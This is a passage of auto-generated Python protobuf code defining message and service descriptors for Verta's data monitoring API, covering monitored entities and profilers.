_UPDATEMONITOREDENTITYREQUEST_RESPONSE = _descriptor.Descriptor(
name='Response',
full_name='ai.verta.monitoring.UpdateMonitoredEntityRequest.Response',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='monitored_entity', full_name='ai.verta.monitoring.UpdateMonitoredEntityRequest.Response.monitored_entity', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=2780,
serialized_end=2854,
)
_UPDATEMONITOREDENTITYREQUEST = _descriptor.Descriptor(
name='UpdateMonitoredEntityRequest',
full_name='ai.verta.monitoring.UpdateMonitoredEntityRequest',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='id', full_name='ai.verta.monitoring.UpdateMonitoredEntityRequest.id', index=0,
number=1, type=4, cpp_type=4, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='name', full_name='ai.verta.monitoring.UpdateMonitoredEntityRequest.name', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='attributes', full_name='ai.verta.monitoring.UpdateMonitoredEntityRequest.attributes', index=2,
number=7, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='resource_visibility', full_name='ai.verta.monitoring.UpdateMonitoredEntityRequest.resource_visibility', index=3,
number=8, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='custom_permission', full_name='ai.verta.monitoring.UpdateMonitoredEntityRequest.custom_permission', index=4,
number=9, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[_UPDATEMONITOREDENTITYREQUEST_ATTRIBUTESENTRY, _UPDATEMONITOREDENTITYREQUEST_RESPONSE, ],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=2893,
serialized_end=3298,
)
_FINDMONITOREDENTITYREQUEST_RESPONSE = _descriptor.Descriptor(
name='Response',
full_name='ai.verta.monitoring.FindMonitoredEntityRequest.Response',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='monitored_entities', full_name='ai.verta.monitoring.FindMonitoredEntityRequest.Response.monitored_entities', index=0,
number=1, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='total_records', full_name='ai.verta.monitoring.FindMonitoredEntityRequest.Response.total_records', index=1,
number=2, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=3471,
serialized_end=3570,
)
_FINDMONITOREDENTITYREQUEST = _descriptor.Descriptor(
name='FindMonitoredEntityRequest',
full_name='ai.verta.monitoring.FindMonitoredEntityRequest',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='ids', full_name='ai.verta.monitoring.FindMonitoredEntityRequest.ids', index=0,
number=1, type=4, cpp_type=4, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='names', full_name='ai.verta.monitoring.FindMonitoredEntityRequest.names', index=1,
number=2, type=9, cpp_type=9, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='fuzzy_names', full_name='ai.verta.monitoring.FindMonitoredEntityRequest.fuzzy_names', index=2,
number=7, type=9, cpp_type=9, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='workspace_id', full_name='ai.verta.monitoring.FindMonitoredEntityRequest.workspace_id', index=3,
number=3, type=4, cpp_type=4, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='workspace_name', full_name='ai.verta.monitoring.FindMonitoredEntityRequest.workspace_name', index=4,
number=6, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='page_number', full_name='ai.verta.monitoring.FindMonitoredEntityRequest.page_number', index=5,
number=4, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='page_limit', full_name='ai.verta.monitoring.FindMonitoredEntityRequest.page_limit', index=6,
number=5, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[_FINDMONITOREDENTITYREQUEST_RESPONSE, ],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
_descriptor.OneofDescriptor(
name='workspace_identifier', full_name='ai.verta.monitoring.FindMonitoredEntityRequest.workspace_identifier',
index=0, containing_type=None, fields=[]),
],
serialized_start=3301,
serialized_end=3594,
)
_DELETEMONITOREDENTITYREQUEST_RESPONSE = _descriptor.Descriptor(
name='Response',
full_name='ai.verta.monitoring.DeleteMonitoredEntityRequest.Response',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=280,
serialized_end=290,
)
_DELETEMONITOREDENTITYREQUEST = _descriptor.Descriptor(
name='DeleteMonitoredEntityRequest',
full_name='ai.verta.monitoring.DeleteMonitoredEntityRequest',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='id', full_name='ai.verta.monitoring.DeleteMonitoredEntityRequest.id', index=0,
number=1, type=4, cpp_type=4, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[_DELETEMONITOREDENTITYREQUEST_RESPONSE, ],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=3596,
serialized_end=3650,
)
_CREATEPROFILERREQUEST_RESPONSE.fields_by_name['profiler'].message_type = _PROFILER
_CREATEPROFILERREQUEST_RESPONSE.containing_type = _CREATEPROFILERREQUEST
_GETPROFILERREQUEST_RESPONSE.fields_by_name['profiler'].message_type = _PROFILER
_GETPROFILERREQUEST_RESPONSE.containing_type = _GETPROFILERREQUEST
_UPDATEPROFILERREQUEST_RESPONSE.fields_by_name['profiler'].message_type = _PROFILER
_UPDATEPROFILERREQUEST_RESPONSE.containing_type = _UPDATEPROFILERREQUEST
_LISTPROFILERSREQUEST_RESPONSE.fields_by_name['profilers'].message_type = _PROFILER
_LISTPROFILERSREQUEST_RESPONSE.containing_type = _LISTPROFILERSREQUEST
_DELETEPROFILERREQUEST_RESPONSE.containing_type = _DELETEPROFILERREQUEST
_BUILDSTATUSENUM_BUILDSTATUS.containing_type = _BUILDSTATUSENUM
_DEPLOYSTATUSENUM_DEPLOYSTATUS.containing_type = _DEPLOYSTATUSENUM
_PROFILERSTATUS.fields_by_name['build_status'].enum_type = _BUILDSTATUSENUM_BUILDSTATUS
_PROFILERSTATUS.fields_by_name['deploy_status'].enum_type = _DEPLOYSTATUSENUM_DEPLOYSTATUS
_GETPROFILERSTATUSREQUEST_RESPONSE.fields_by_name['status'].message_type = _PROFILERSTATUS
_GETPROFILERSTATUSREQUEST_RESPONSE.containing_type = _GETPROFILERSTATUSREQUEST
_FINDPROFILERSFORMONITOREDENTITYREQUEST_RESPONSE.fields_by_name['statuses'].message_type = _PROFILERSTATUS
_FINDPROFILERSFORMONITOREDENTITYREQUEST_RESPONSE.containing_type = _FINDPROFILERSFORMONITOREDENTITYREQUEST
_KEYVALUE.fields_by_name['value'].message_type = google_dot_protobuf_dot_struct__pb2._VALUE
_KEYVALUE.fields_by_name['value_type'].enum_type = _VALUETYPEENUM_VALUETYPE
_VALUETYPEENUM_VALUETYPE.containing_type = _VALUETYPEENUM
_ENABLEPROFILERREQUEST_RESPONSE.fields_by_name['status'].message_type = _PROFILERSTATUS
_ENABLEPROFILERREQUEST_RESPONSE.containing_type = _ENABLEPROFILERREQUEST
_ENABLEPROFILERREQUEST.fields_by_name['environment'].message_type = _KEYVALUE
_DISABLEPROFILERREQUEST_RESPONSE.fields_by_name['status'].message_type = _PROFILERSTATUS
_DISABLEPROFILERREQUEST_RESPONSE.containing_type = _DISABLEPROFILERREQUEST
_MONITOREDENTITY_ATTRIBUTESENTRY.containing_type = _MONITOREDENTITY
_MONITOREDENTITY.fields_by_name['attributes'].message_type = _MONITOREDENTITY_ATTRIBUTESENTRY
_MONITOREDENTITY.fields_by_name['resource_visibility'].enum_type = uac_dot_Collaborator__pb2._RESOURCEVISIBILITY
_MONITOREDENTITY.fields_by_name['custom_permission'].message_type = uac_dot_Collaborator__pb2._COLLABORATORPERMISSIONS
_CREATEMONITOREDENTITYREQUEST_ATTRIBUTESENTRY.containing_type = _CREATEMONITOREDENTITYREQUEST
_CREATEMONITOREDENTITYREQUEST_RESPONSE.fields_by_name['monitored_entity'].message_type = _MONITOREDENTITY
_CREATEMONITOREDENTITYREQUEST_RESPONSE.containing_type = _CREATEMONITOREDENTITYREQUEST
_CREATEMONITOREDENTITYREQUEST.fields_by_name['attributes'].message_type = _CREATEMONITOREDENTITYREQUEST_ATTRIBUTESENTRY
_CREATEMONITOREDENTITYREQUEST.fields_by_name['resource_visibility'].enum_type = uac_dot_Collaborator__pb2._RESOURCEVISIBILITY
_CREATEMONITOREDENTITYREQUEST.fields_by_name['custom_permission'].message_type = uac_dot_Collaborator__pb2._COLLABORATORPERMISSIONS
_CREATEMONITOREDENTITYREQUEST.oneofs_by_name['workspace_identifier'].fields.append(
_CREATEMONITOREDENTITYREQUEST.fields_by_name['workspace_id'])
_CREATEMONITOREDENTITYREQUEST.fields_by_name['workspace_id'].containing_oneof = _CREATEMONITOREDENTITYREQUEST.oneofs_by_name['workspace_identifier']
_CREATEMONITOREDENTITYREQUEST.oneofs_by_name['workspace_identifier'].fields.append(
_CREATEMONITOREDENTITYREQUEST.fields_by_name['workspace_name'])
_CREATEMONITOREDENTITYREQUEST.fields_by_name['workspace_name'].containing_oneof = _CREATEMONITOREDENTITYREQUEST.oneofs_by_name['workspace_identifier']
_UPDATEMONITOREDENTITYREQUEST_ATTRIBUTESENTRY.containing_type = _UPDATEMONITOREDENTITYREQUEST
_UPDATEMONITOREDENTITYREQUEST_RESPONSE.fields_by_name['monitored_entity'].message_type = _MONITOREDENTITY
_UPDATEMONITOREDENTITYREQUEST_RESPONSE.containing_type = _UPDATEMONITOREDENTITYREQUEST
_UPDATEMONITOREDENTITYREQUEST.fields_by_name['attributes'].message_type = _UPDATEMONITOREDENTITYREQUEST_ATTRIBUTESENTRY
_UPDATEMONITOREDENTITYREQUEST.fields_by_name['resource_visibility'].enum_type = uac_dot_Collaborator__pb2._RESOURCEVISIBILITY
_UPDATEMONITOREDENTITYREQUEST.fields_by_name['custom_permission'].message_type = uac_dot_Collaborator__pb2._COLLABORATORPERMISSIONS
_FINDMONITOREDENTITYREQUEST_RESPONSE.fields_by_name['monitored_entities'].message_type = _MONITOREDENTITY
_FINDMONITOREDENTITYREQUEST_RESPONSE.containing_type = _FINDMONITOREDENTITYREQUEST
_FINDMONITOREDENTITYREQUEST.oneofs_by_name['workspace_identifier'].fields.append(
_FINDMONITOREDENTITYREQUEST.fields_by_name['workspace_id'])
_FINDMONITOREDENTITYREQUEST.fields_by_name['workspace_id'].containing_oneof = _FINDMONITOREDENTITYREQUEST.oneofs_by_name['workspace_identifier']
_FINDMONITOREDENTITYREQUEST.oneofs_by_name['workspace_identifier'].fields.append(
_FINDMONITOREDENTITYREQUEST.fields_by_name['workspace_name'])
_FINDMONITOREDENTITYREQUEST.fields_by_name['workspace_name'].containing_oneof = _FINDMONITOREDENTITYREQUEST.oneofs_by_name['workspace_identifier']
_DELETEMONITOREDENTITYREQUEST_RESPONSE.containing_type = _DELETEMONITOREDENTITYREQUEST
DESCRIPTOR.message_types_by_name['Profiler'] = _PROFILER
DESCRIPTOR.message_types_by_name['CreateProfilerRequest'] = _CREATEPROFILERREQUEST
DESCRIPTOR.message_types_by_name['GetProfilerRequest'] = _GETPROFILERREQUEST
DESCRIPTOR.message_types_by_name['UpdateProfilerRequest'] = _UPDATEPROFILERREQUEST
DESCRIPTOR.message_types_by_name['ListProfilersRequest'] = _LISTPROFILERSREQUEST
DESCRIPTOR.message_types_by_name['DeleteProfilerRequest'] = _DELETEPROFILERREQUEST
DESCRIPTOR.message_types_by_name['BuildStatusEnum'] = _BUILDSTATUSENUM
DESCRIPTOR.message_types_by_name['DeployStatusEnum'] = _DEPLOYSTATUSENUM
DESCRIPTOR.message_types_by_name['ProfilerStatus'] = _PROFILERSTATUS
DESCRIPTOR.message_types_by_name['GetProfilerStatusRequest'] = _GETPROFILERSTATUSREQUEST
DESCRIPTOR.message_types_by_name['FindProfilersForMonitoredEntityRequest'] = _FINDPROFILERSFORMONITOREDENTITYREQUEST
DESCRIPTOR.message_types_by_name['KeyValue'] = _KEYVALUE
DESCRIPTOR.message_types_by_name['ValueTypeEnum'] = _VALUETYPEENUM
DESCRIPTOR.message_types_by_name['EnableProfilerRequest'] = _ENABLEPROFILERREQUEST
DESCRIPTOR.message_types_by_name['DisableProfilerRequest'] = _DISABLEPROFILERREQUEST
DESCRIPTOR.message_types_by_name['MonitoredEntity'] = _MONITOREDENTITY
DESCRIPTOR.message_types_by_name['CreateMonitoredEntityRequest'] = _CREATEMONITOREDENTITYREQUEST
DESCRIPTOR.message_types_by_name['UpdateMonitoredEntityRequest'] = _UPDATEMONITOREDENTITYREQUEST
DESCRIPTOR.message_types_by_name['FindMonitoredEntityRequest'] = _FINDMONITOREDENTITYREQUEST
DESCRIPTOR.message_types_by_name['DeleteMonitoredEntityRequest'] = _DELETEMONITOREDENTITYREQUEST
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
Profiler = _reflection.GeneratedProtocolMessageType('Profiler', (_message.Message,), {
'DESCRIPTOR' : _PROFILER,
'__module__' : 'monitoring.DataMonitoringService_pb2'
# @@protoc_insertion_point(class_scope:ai.verta.monitoring.Profiler)
})
_sym_db.RegisterMessage(Profiler)
CreateProfilerRequest = _reflection.GeneratedProtocolMessageType('CreateProfilerRequest', (_message.Message,), {
'Response' : _reflection.GeneratedProtocolMessageType('Response', (_message.Message,), {
'DESCRIPTOR' : _CREATEPROFILERREQUEST_RESPONSE,
'__module__' : 'monitoring.DataMonitoringService_pb2'
# @@protoc_insertion_point(class_scope:ai.verta.monitoring.CreateProfilerRequest.Response)
})
,
'DESCRIPTOR' : _CREATEPROFILERREQUEST,
'__module__' : 'monitoring.DataMonitoringService_pb2'
# @@protoc_insertion_point(class_scope:ai.verta.monitoring.CreateProfilerRequest)
})
_sym_db.RegisterMessage(CreateProfilerRequest)
_sym_db.RegisterMessage(CreateProfilerRequest.Response)
GetProfilerRequest = _reflection.GeneratedProtocolMessageType('GetProfilerRequest', (_message.Message,), {
'Response' : _reflection.GeneratedProtocolMessageType('Response', (_message.Message,), {
'DESCRIPTOR' : _GETPROFILERREQUEST_RESPONSE,
'__module__' : 'monitoring.DataMonitoringService_pb2'
# @@protoc_insertion_point(class_scope:ai.verta.monitoring.GetProfilerRequest.Response)
})
,
'DESCRIPTOR' : _GETPROFILERREQUEST,
'__module__' : 'monitoring.DataMonitoringService_pb2'
# @@protoc_insertion_point(class_scope:ai.verta.monitoring.GetProfilerRequest)
})
_sym_db.RegisterMessage(GetProfilerRequest)
_sym_db.RegisterMessage(GetProfilerRequest.Response)
UpdateProfilerRequest = _reflection.GeneratedProtocolMessageType('UpdateProfilerRequest', (_message.Message,), {
'Response' : _reflection.GeneratedProtocolMessageType('Response', (_message.Message,), {
'DESCRIPTOR' : _UPDATEPROFILERREQUEST_RESPONSE,
'__module__' : 'monitoring.DataMonitoringService_pb2'
# @@protoc_insertion_point(class_scope:ai.verta.monitoring.UpdateProfilerRequest.Response)
})
,
'DESCRIPTOR' : _UPDATEPROFILERREQUEST,
'__module__' : 'monitoring.DataMonitoringService_pb2'
# @@protoc_insertion_point(class_scope:ai.verta.monitoring.UpdateProfilerRequest)
})
_sym_db.RegisterMessage(UpdateProfilerRequest)
_sym_db.RegisterMessage(UpdateProfilerRequest.Response)
ListProfilersRequest = _reflection.GeneratedProtocolMessageType('ListProfilersRequest', (_message.Message,), {
'Response' : _reflection.GeneratedProtocolMessageType('Response', (_message.Message,), {
'DESCRIPTOR' : _LISTPROFILERSREQUEST_RESPONSE,
'__module__' : 'monitoring.DataMonitoringService_pb2'
# @@protoc_insertion_point(class_scope:ai.verta.monitoring.ListProfilersRequest.Response)
})
,
'DESCRIPTOR' : _LISTPROFILERSREQUEST,
'__module__' : 'monitoring.DataMonitoringService_pb2'
# @@protoc_insertion_point(class_scope:ai.verta.monitoring.ListProfilersRequest)
})
_sym_db.RegisterMessage(ListProfilersRequest)
_sym_db.RegisterMessage(ListProfilersRequest.Response)
DeleteProfilerRequest = _reflection.GeneratedProtocolMessageType('DeleteProfilerRequest', (_message.Message,), {
'Response' : _reflection.GeneratedProtocolMessageType('Response', (_message.Message,), {
'DESCRIPTOR' : _DELETEPROFILERREQUEST_RESPONSE,
'__module__' : 'monitoring.DataMonitoringService_pb2'
# @@protoc_insertion_point(class_scope:ai.verta.monitoring.DeleteProfilerRequest.Response)
})
,
'DESCRIPTOR' : _DELETEPROFILERREQUEST,
'__module__' : 'monitoring.DataMonitoringService_pb2'
# @@protoc_insertion_point(class_scope:ai.verta.monitoring.DeleteProfilerRequest)
})
_sym_db.RegisterMessage(DeleteProfilerRequest)
_sym_db.RegisterMessage(DeleteProfilerRequest.Response)
BuildStatusEnum = _reflection.GeneratedProtocolMessageType('BuildStatusEnum', (_message.Message,), {
'DESCRIPTOR' : _BUILDSTATUSENUM,
'__module__' : 'monitoring.DataMonitoringService_pb2'
# @@protoc_insertion_point(class_scope:ai.verta.monitoring.BuildStatusEnum)
})
_sym_db.RegisterMessage(BuildStatusEnum)
DeployStatusEnum = _reflection.GeneratedProtocolMessageType('DeployStatusEnum', (_message.Message,), {
'DESCRIPTOR' : _DEPLOYSTATUSENUM,
'__module__' : 'monitoring.DataMonitoringService_pb2'
# @@protoc_insertion_point(class_scope:ai.verta.monitoring.DeployStatusEnum)
})
_sym_db.RegisterMessage(DeployStatusEnum)
ProfilerStatus = _reflection.GeneratedProtocolMessageType('ProfilerStatus', (_message.Message,), {
'DESCRIPTOR' : _PROFILERSTATUS,
'__module__' : 'monitoring.DataMonitoringService_pb2'
# @@protoc_insertion_point(class_scope:ai.verta.monitoring.ProfilerStatus)
})
_sym_db.RegisterMessage(ProfilerStatus)
GetProfilerStatusRequest = _reflection.GeneratedProtocolMessageType('GetProfilerStatusRequest', (_message.Message,), {
'Response' : _reflection.GeneratedProtocolMessageType('Response', (_message.Message,), {
'DESCRIPTOR' : _GETPROFILERSTATUSREQUEST_RESPONSE,
'__module__' : 'monitoring.DataMonitoringService_pb2'
# @@protoc_insertion_point(class_scope:ai.verta.monitoring.GetProfilerStatusRequest.Response)
})
,
'DESCRIPTOR' : _GETPROFILERSTATUSREQUEST,
'__module__' : 'monitoring.DataMonitoringService_pb2'
# @@protoc_insertion_point(class_scope:ai.verta.monitoring.GetProfilerStatusRequest)
})
_sym_db.RegisterMessage(GetProfilerStatusRequest)
_sym_db.RegisterMessage(GetProfilerStatusRequest.Response)
FindProfilersForMonitoredEntityRequest = _reflection.GeneratedProtocolMessageType('FindProfilersForMonitoredEntityRequest', (_message.Message,), {
'Response' : _reflection.GeneratedProtocolMessageType('Response', (_message.Message,), {
'DESCRIPTOR' : _FINDPROFILERSFORMONITOREDENTITYREQUEST_RESPONSE,
'__module__' : 'monitoring.DataMonitoringService_pb2'
# @@protoc_insertion_point(class_scope:ai.verta.monitoring.FindProfilersForMonitoredEntityRequest.Response)
})
,
'DESCRIPTOR' : _FINDPROFILERSFORMONITOREDENTITYREQUEST,
'__module__' : 'monitoring.DataMonitoringService_pb2'
# @@protoc_insertion_point(class_scope:ai.verta.monitoring.FindProfilersForMonitoredEntityRequest)
})
_sym_db.RegisterMessage(FindProfilersForMonitoredEntityRequest)
_sym_db.RegisterMessage(FindProfilersForMonitoredEntityRequest.Response)
KeyValue = _reflection.GeneratedProtocolMessageType('KeyValue', (_message.Message,), {
'DESCRIPTOR' : _KEYVALUE,
'__module__' : 'monitoring.DataMonitoringService_pb2'
# @@protoc_insertion_point(class_scope:ai.verta.monitoring.KeyValue)
})
_sym_db.RegisterMessage(KeyValue)
ValueTypeEnum = _reflection.GeneratedProtocolMessageType('ValueTypeEnum', (_message.Message,), {
'DESCRIPTOR' : _VALUETYPEENUM,
'__module__' : 'monitoring.DataMonitoringService_pb2'
# @@protoc_insertion_point(class_scope:ai.verta.monitoring.ValueTypeEnum)
})
_sym_db.RegisterMessage(ValueTypeEnum)
EnableProfilerRequest = _reflection.GeneratedProtocolMessageType('EnableProfilerRequest', (_message.Message,), {
'Response' : _reflection.GeneratedProtocolMessageType('Response', (_message.Message,), {
'DESCRIPTOR' : _ENABLEPROFILERREQUEST_RESPONSE,
'__module__' : 'monitoring.DataMonitoringService_pb2'
# @@protoc_insertion_point(class_scope:ai.verta.monitoring.EnableProfilerRequest.Response)
})
,
'DESCRIPTOR' : _ENABLEPROFILERREQUEST,
'__module__' : 'monitoring.DataMonitoringService_pb2'
# @@protoc_insertion_point(class_scope:ai.verta.monitoring.EnableProfilerRequest)
})
_sym_db.RegisterMessage(EnableProfilerRequest)
_sym_db.RegisterMessage(EnableProfilerRequest.Response)
DisableProfilerRequest = _reflection.GeneratedProtocolMessageType('DisableProfilerRequest', (_message.Message,), {
'Response' : _reflection.GeneratedProtocolMessageType('Response', (_message.Message,), {
'DESCRIPTOR' : _DISABLEPROFILERREQUEST_RESPONSE,
'__module__' : 'monitoring.DataMonitoringService_pb2'
# @@protoc_insertion_point(class_scope:ai.verta.monitoring.DisableProfilerRequest.Response)
})
,
'DESCRIPTOR' : _DISABLEPROFILERREQUEST,
'__module__' : 'monitoring.DataMonitoringService_pb2'
# @@protoc_insertion_point(class_scope:ai.verta.monitoring.DisableProfilerRequest)
})
_sym_db.RegisterMessage(DisableProfilerRequest)
_sym_db.RegisterMessage(DisableProfilerRequest.Response)
MonitoredEntity = _reflection.GeneratedProtocolMessageType('MonitoredEntity', (_message.Message,), {
'AttributesEntry' : _reflection.GeneratedProtocolMessageType('AttributesEntry', (_message.Message,), {
'DESCRIPTOR' : _MONITOREDENTITY_ATTRIBUTESENTRY,
'__module__' : 'monitoring.DataMonitoringService_pb2'
# @@protoc_insertion_point(class_scope:ai.verta.monitoring.MonitoredEntity.AttributesEntry)
})
,
'DESCRIPTOR' : _MONITOREDENTITY,
'__module__' : 'monitoring.DataMonitoringService_pb2'
# @@protoc_insertion_point(class_scope:ai.verta.monitoring.MonitoredEntity)
})
_sym_db.RegisterMessage(MonitoredEntity)
_sym_db.RegisterMessage(MonitoredEntity.AttributesEntry)
CreateMonitoredEntityRequest = _reflection.GeneratedProtocolMessageType('CreateMonitoredEntityRequest', (_message.Message,), {
'AttributesEntry' : _reflection.GeneratedProtocolMessageType('AttributesEntry', (_message.Message,), {
'DESCRIPTOR' : _CREATEMONITOREDENTITYREQUEST_ATTRIBUTESENTRY,
'__module__' : 'monitoring.DataMonitoringService_pb2'
# @@protoc_insertion_point(class_scope:ai.verta.monitoring.CreateMonitoredEntityRequest.AttributesEntry)
})
,
'Response' : _reflection.GeneratedProtocolMessageType('Response', (_message.Message,), {
'DESCRIPTOR' : _CREATEMONITOREDENTITYREQUEST_RESPONSE,
'__module__' : 'monitoring.DataMonitoringService_pb2'
# @@protoc_insertion_point(class_scope:ai.verta.monitoring.CreateMonitoredEntityRequest.Response)
})
,
'DESCRIPTOR' : _CREATEMONITOREDENTITYREQUEST,
'__module__' : 'monitoring.DataMonitoringService_pb2'
# @@protoc_insertion_point(class_scope:ai.verta.monitoring.CreateMonitoredEntityRequest)
})
_sym_db.RegisterMessage(CreateMonitoredEntityRequest)
_sym_db.RegisterMessage(CreateMonitoredEntityRequest.AttributesEntry)
_sym_db.RegisterMessage(CreateMonitoredEntityRequest.Response)
UpdateMonitoredEntityRequest = _reflection.GeneratedProtocolMessageType('UpdateMonitoredEntityRequest', (_message.Message,), {
'AttributesEntry' : _reflection.GeneratedProtocolMessageType('AttributesEntry', (_message.Message,), {
'DESCRIPTOR' : _UPDATEMONITOREDENTITYREQUEST_ATTRIBUTESENTRY,
'__module__' : 'monitoring.DataMonitoringService_pb2'
# @@protoc_insertion_point(class_scope:ai.verta.monitoring.UpdateMonitoredEntityRequest.AttributesEntry)
})
,
'Response' : _reflection.GeneratedProtocolMessageType('Response', (_message.Message,), {
'DESCRIPTOR' : _UPDATEMONITOREDENTITYREQUEST_RESPONSE,
'__module__' : 'monitoring.DataMonitoringService_pb2'
# @@protoc_insertion_point(class_scope:ai.verta.monitoring.UpdateMonitoredEntityRequest.Response)
})
,
'DESCRIPTOR' : _UPDATEMONITOREDENTITYREQUEST,
'__module__' : 'monitoring.DataMonitoringService_pb2'
# @@protoc_insertion_point(class_scope:ai.verta.monitoring.UpdateMonitoredEntityRequest)
})
_sym_db.RegisterMessage(UpdateMonitoredEntityRequest)
_sym_db.RegisterMessage(UpdateMonitoredEntityRequest.AttributesEntry)
_sym_db.RegisterMessage(UpdateMonitoredEntityRequest.Response)
FindMonitoredEntityRequest = _reflection.GeneratedProtocolMessageType('FindMonitoredEntityRequest', (_message.Message,), {
'Response' : _reflection.GeneratedProtocolMessageType('Response', (_message.Message,), {
'DESCRIPTOR' : _FINDMONITOREDENTITYREQUEST_RESPONSE,
'__module__' : 'monitoring.DataMonitoringService_pb2'
# @@protoc_insertion_point(class_scope:ai.verta.monitoring.FindMonitoredEntityRequest.Response)
})
,
'DESCRIPTOR' : _FINDMONITOREDENTITYREQUEST,
'__module__' : 'monitoring.DataMonitoringService_pb2'
# @@protoc_insertion_point(class_scope:ai.verta.monitoring.FindMonitoredEntityRequest)
})
_sym_db.RegisterMessage(FindMonitoredEntityRequest)
_sym_db.RegisterMessage(FindMonitoredEntityRequest.Response)
DeleteMonitoredEntityRequest = _reflection.GeneratedProtocolMessageType('DeleteMonitoredEntityRequest', (_message.Message,), {
'Response' : _reflection.GeneratedProtocolMessageType('Response', (_message.Message,), {
'DESCRIPTOR' : _DELETEMONITOREDENTITYREQUEST_RESPONSE,
'__module__' : 'monitoring.DataMonitoringService_pb2'
# @@protoc_insertion_point(class_scope:ai.verta.monitoring.DeleteMonitoredEntityRequest.Response)
})
,
'DESCRIPTOR' : _DELETEMONITOREDENTITYREQUEST,
'__module__' : 'monitoring.DataMonitoringService_pb2'
# @@protoc_insertion_point(class_scope:ai.verta.monitoring.DeleteMonitoredEntityRequest)
})
_sym_db.RegisterMessage(DeleteMonitoredEntityRequest)
_sym_db.RegisterMessage(DeleteMonitoredEntityRequest.Response)
DESCRIPTOR._options = None
_MONITOREDENTITY_ATTRIBUTESENTRY._options = None
_CREATEMONITOREDENTITYREQUEST_ATTRIBUTESENTRY._options = None
_UPDATEMONITOREDENTITYREQUEST_ATTRIBUTESENTRY._options = None
_DATAMONITORINGSERVICE = _descriptor.ServiceDescriptor(
name='DataMonitoringService',
full_name='ai.verta.monitoring.DataMonitoringService',
file=DESCRIPTOR,
index=0,
serialized_options=None,
serialized_start=3653,
serialized_end=6165,
methods=[
_descriptor.MethodDescriptor(
name='createMonitoredEntity',
full_name='ai.verta.monitoring.DataMonitoringService.createMonitoredEntity',
index=0,
containing_service=None,
input_type=_CREATEMONITOREDENTITYREQUEST,
output_type=_CREATEMONITOREDENTITYREQUEST_RESPONSE,
